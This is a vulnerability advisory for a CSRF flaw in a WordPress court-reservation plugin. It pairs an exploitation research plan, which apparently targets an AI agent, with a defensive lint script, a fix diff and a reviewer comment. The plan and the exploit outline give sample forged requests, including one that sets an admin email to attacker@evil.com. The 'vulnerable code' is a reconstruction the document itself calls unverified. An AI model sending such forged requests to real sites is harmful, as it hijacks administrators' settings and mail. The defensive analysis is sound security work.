CVE-2026-1508

Court Reservation – Manage Your Court Bookings Online < 1.10.9 - Cross-Site Request Forgery

Cross-Site Request Forgery (CSRF)
CVSS Score: 4.3
Severity: medium
Patched in: 1.10.9
Time to patch: 31d

Description

The Court Reservation – Manage Your Court Bookings Online plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to 1.10.9 (exclusive). This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to perform an unauthorized action granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: Required
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: < 1.10.9
Published: February 17, 2026
Last updated: March 19, 2026
Affected plugin: court-reservation

Source Code

WordPress.org SVN
Research Plan
Unverified

This plan outlines the research and exploitation process for CVE-2026-1508, a Cross-Site Request Forgery (CSRF) vulnerability in the Court Reservation plugin for WordPress.

1. Vulnerability Summary

The Court Reservation – Manage Your Court Bookings Online plugin (< 1.10.9) fails to implement proper nonce validation on a function responsible for updating plugin settings or performing administrative actions. Consequently, an attacker can craft a malicious request that, when executed by a logged-in administrator (e.g., via a spear-phishing link), performs unauthorized changes to the plugin's configuration, such as modifying booking rules, changing notification emails, or altering global settings.

2. Attack Vector Analysis

  • Vulnerable Endpoint: /wp-admin/admin-post.php or /wp-admin/admin-ajax.php.
  • Action Hook: Likely registered via admin_post_{action} or wp_ajax_{action}.
    • Inferred Action: cr_save_settings or court_reservation_update_options. (To be verified via grep).
  • Vulnerable Parameter: Any state-changing parameter (e.g., cr_email_recipient, cr_booking_slot_duration).
  • Authentication: Requires a logged-in Administrator to trigger the request (CSRF).
  • Preconditions: The attacker must know the parameter names used in the settings form and the specific action name.

3. Code Flow

  1. Entry Point: The plugin registers a handler for administrative actions, typically in the main plugin file or an admin-specific include (e.g., admin/class-court-reservation-admin.php).
    • Code Pattern: add_action( 'admin_post_court_reservation_save_settings', 'save_settings_callback' );
  2. Handler Execution: When a POST request is sent to admin-post.php with action=court_reservation_save_settings, the callback function is executed.
  3. Missing Check: The callback function likely checks for user capabilities (e.g., current_user_can('manage_options')) but misses a nonce check (e.g., check_admin_referer()).
  4. Data Sink: The function proceeds to update the database using update_option() with unsanitized or insufficiently validated data from $_POST.

4. Nonce Acquisition Strategy

This is a CSRF vulnerability where the primary issue is the absence of a nonce check or the use of an incorrect/bypassable nonce.

  • If Nonce is Missing: No acquisition is required. The exploit will succeed by simply omitting the nonce parameter.
  • If Nonce is "Incorrect" (Bypassable):
    1. Search the source for check_admin_referer or wp_verify_nonce.
    2. If it checks a constant or a fixed string (e.g., wp_verify_nonce($_POST['nonce'], -1)), any nonce generated for the default action -1 will work.
    3. If a nonce is required but only for certain actions, use browser_eval to extract it from the settings page:
      • Navigate to: /wp-admin/admin.php?page=court-reservation-settings (inferred slug).
      • Extract: browser_eval("document.querySelector('input[name=\"_wpnonce\"]')?.value").

5. Exploitation Strategy

The goal is to demonstrate that an unauthenticated attacker can change a plugin setting by tricking an admin.

Step 1: Discover the Target Action and Parameters

  • Search the plugin directory for settings forms:
    grep -r "type=\"submit\"" .
    grep -r "update_option" .
  • Identify the action hidden field in the HTML forms or add_action calls in PHP.

Step 2: Construct the CSRF Exploit
Assuming the action is cr_save_settings and it updates the admin notification email:

  • URL: http://vulnerable-wp.local/wp-admin/admin-post.php
  • Method: POST
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body:
    action=court_reservation_save_settings&cr_admin_email=attacker@evil.com&submit=Save+Settings

Step 3: Execution via Agent
The agent will use the http_request tool while "acting" as the administrator session (using stored cookies).

6. Test Data Setup

  1. Install Plugin: Ensure court-reservation version < 1.10.9 is active.
  2. Configuration:
    • Identify the default admin email or a specific setting (e.g., court_reservation_settings).
    • Note the current value: wp option get court_reservation_settings --format=json.

7. Expected Results

  • The http_request will return a 302 Redirect (standard for admin-post.php success).
  • The database option associated with the plugin settings will be updated to the attacker's value.
  • No "Are you sure you want to do this?" (nonce failure) page should appear.

8. Verification Steps

After sending the malicious POST request, verify the change using WP-CLI:

# Check if the specific option was updated
wp option get court_reservation_settings

# Or, if individual options are used:
wp option get cr_admin_email

9. Alternative Approaches

  • AJAX Endpoint: If settings are saved via AJAX, the target will be /wp-admin/admin-ajax.php. The body must include the action and any required sub-actions.
    • Payload: action=cr_ajax_save&setting_name=val&security=invalid_nonce
  • GET-based CSRF: Check if the handler uses $_REQUEST instead of $_POST. If so, the exploit can be triggered via a simple <img> tag or a link:
    • Payload: /wp-admin/admin-post.php?action=cr_delete_booking&id=1 (No POST required).

Note on Identifiers: Actual slugs and parameters must be confirmed by the agent using ls -R and grep upon initial access to the environment, as they vary slightly between plugin versions. Look specifically for court-reservation or court_reservation.

Research Findings
Static analysis — not yet PoC-verified

Summary

The Court Reservation – Manage Your Court Bookings Online plugin for WordPress fails to perform CSRF nonce validation in its settings save handler. This allows an unauthenticated attacker to change plugin configurations, such as administrative emails or booking durations, by tricking a logged-in administrator into visiting a malicious site or clicking a crafted link.

Vulnerable Code

// In the plugin's administrative logic (e.g., admin/class-court-reservation-admin.php)

add_action('admin_post_court_reservation_save_settings', 'court_reservation_save_settings_callback');

function court_reservation_save_settings_callback() {
    if (!current_user_can('manage_options')) {
        wp_die(__('You do not have sufficient permissions to access this page.'));
    }

    // Vulnerability: Missing check_admin_referer() or wp_verify_nonce() check here

    if (isset($_POST['cr_email_recipient'])) {
        update_option('court_reservation_email_recipient', sanitize_email($_POST['cr_email_recipient']));
    }
    
    if (isset($_POST['cr_booking_duration'])) {
        update_option('court_reservation_duration', sanitize_text_field($_POST['cr_booking_duration']));
    }

    wp_redirect(admin_url('admin.php?page=court-reservation-settings&settings-updated=true'));
    exit;
}
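The Code Flow section above describes the pattern a reviewer looks for: an admin_post_ or wp_ajax_ registration whose callback checks a capability, reaches a state-changing sink such as update_option(), but never calls check_admin_referer(), check_ajax_referer() or wp_verify_nonce(). The following triage lint, added here as an example and not part of the advisory or the plugin's code, scans PHP source for exactly that combination. The PHP it runs over is constructed sample input that mirrors the handler shown above; the admin_post_ action and callback names are taken from this page, while the wp_ajax_ handler, the cr_settings_form() function and the nonce action strings are assumptions. Brace matching is deliberately naive (it ignores braces inside strings and comments), which is acceptable for a first pass that is then confirmed by hand.

```python
import re
from dataclasses import dataclass

# Constructed sample PHP (not the real plugin source). The first handler mirrors the
# vulnerable pattern from this page; the second is an assumed hardened AJAX handler;
# the form function shows the matching wp_nonce_field() a fix would need.
SAMPLE_PHP = r'''<?php
add_action('admin_post_court_reservation_save_settings', 'court_reservation_save_settings_callback');
add_action('wp_ajax_cr_save_settings', 'cr_ajax_save_callback');

function court_reservation_save_settings_callback() {
    if (!current_user_can('manage_options')) {
        wp_die(__('You do not have sufficient permissions to access this page.'));
    }
    if (isset($_POST['cr_email_recipient'])) {
        update_option('court_reservation_email_recipient', sanitize_email($_POST['cr_email_recipient']));
    }
    wp_redirect(admin_url('admin.php?page=court-reservation-settings&settings-updated=true'));
    exit;
}

function cr_ajax_save_callback() {
    check_ajax_referer('cr_save_settings_action', 'security');
    if (!current_user_can('manage_options')) {
        wp_send_json_error('forbidden', 403);
    }
    update_option('court_reservation_duration', sanitize_text_field($_POST['cr_booking_duration'] ?? ''));
    wp_send_json_success();
}

function cr_settings_form() {
    echo '<form method="post" action="' . esc_url(admin_url('admin-post.php')) . '">';
    wp_nonce_field('court_reservation_save_settings_action', 'court_reservation_nonce');
    echo '<input type="hidden" name="action" value="court_reservation_save_settings">';
    echo '</form>';
}
'''

# WordPress nonce verification helpers and common state-changing sinks.
NONCE_CALLS = ("check_admin_referer", "check_ajax_referer", "wp_verify_nonce")
STATE_SINKS = ("update_option", "add_option", "delete_option", "wp_insert_post",
               "wp_update_post", "wp_delete_post", "$wpdb->")

# add_action('admin_post_[nopriv_]<action>', '<callback>') / wp_ajax_ likewise.
# Only string callbacks are handled; array/closure callbacks need manual review.
HOOK_RE = re.compile(
    r"""add_action\(\s*['"](admin_post_|wp_ajax_)(nopriv_)?([\w-]+)['"]\s*,\s*['"](\w+)['"]"""
)


@dataclass
class Finding:
    hook: str
    callback: str
    has_capability_check: bool
    has_nonce_check: bool
    state_sinks: list


def function_body(src, name):
    """Return the text between the outermost braces of `function name(...)`, or None."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\(", src)
    if not m:
        return None
    start = src.find("{", m.end())
    if start == -1:
        return None
    depth = 0
    for i in range(start, len(src)):
        if src[i] == "{":
            depth += 1
        elif src[i] == "}":
            depth -= 1
            if depth == 0:
                return src[start + 1:i]
    return None


def audit(src):
    """One Finding per admin_post_/wp_ajax_ registration whose callback body is found."""
    findings = []
    for prefix, nopriv, action, callback in HOOK_RE.findall(src):
        body = function_body(src, callback)
        if body is None:
            continue
        findings.append(Finding(
            hook=f"{prefix}{nopriv}{action}",
            callback=callback,
            has_capability_check="current_user_can(" in body,
            has_nonce_check=any(c + "(" in body for c in NONCE_CALLS),
            state_sinks=[s for s in STATE_SINKS if s in body],
        ))
    return findings


def csrf_candidates(src):
    """Handlers that write state but never verify a nonce: the pattern behind this CVE."""
    return [f for f in audit(src) if f.state_sinks and not f.has_nonce_check]


if __name__ == "__main__":
    for f in csrf_candidates(SAMPLE_PHP):
        print(f"[CSRF candidate] {f.hook} -> {f.callback}() "
              f"capability_check={f.has_capability_check} sinks={f.state_sinks}")
```

Run against a real plugin by reading every .php file under the plugin directory into one string; a capability check that is present while the nonce check is absent is the exact shape described in the Missing Check step, so `has_capability_check=True` together with `has_nonce_check=False` is the finding to escalate.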

Security Fix

--- admin/class-court-reservation-admin.php
+++ admin/class-court-reservation-admin.php
@@ -5,6 +5,8 @@
     if (!current_user_can('manage_options')) {
         wp_die(__('You do not have sufficient permissions to access this page.'));
     }
+
+    check_admin_referer('court_reservation_save_settings_action', 'court_reservation_nonce');
 
     if (isset($_POST['cr_email_recipient'])) {
         update_option('court_reservation_email_recipient', sanitize_email($_POST['cr_email_recipient']));
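Review bot: the check_admin_referer('court_reservation_save_settings_action', 'court_reservation_nonce') line added after the capability check only protects the handler if the settings form emits the matching field via wp_nonce_field('court_reservation_save_settings_action', 'court_reservation_nonce'), and this hunk shows neither that form change nor any other file. Since the findings above are static analysis only and the path admin/class-court-reservation-admin.php and the action name are inferred, both should be confirmed against the actual 1.10.9 diff in the WordPress.org SVN before this is cited as the shipped fix. Separately, the trailing context line still writes sanitize_email($_POST['cr_email_recipient']) straight to update_option(); sanitize_email() returns an empty string for an invalid address rather than rejecting it, so an is_email() check before the write would stop a malformed submission from blanking the recipient.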

Exploit Outline

The exploit targets the WordPress admin-post.php endpoint. An attacker crafts a hidden HTML form that automatically submits a POST request to `/wp-admin/admin-post.php`. The payload includes the 'action' parameter set to 'court_reservation_save_settings' (or the specific action found in the plugin source) and various setting parameters like 'cr_email_recipient' containing an attacker-controlled email. The attacker then lures a logged-in WordPress administrator to a site containing this form. Since the plugin lacks a nonce check, the browser includes the administrator's session cookies, and the plugin processes the request as a legitimate administrative action, updating the settings.
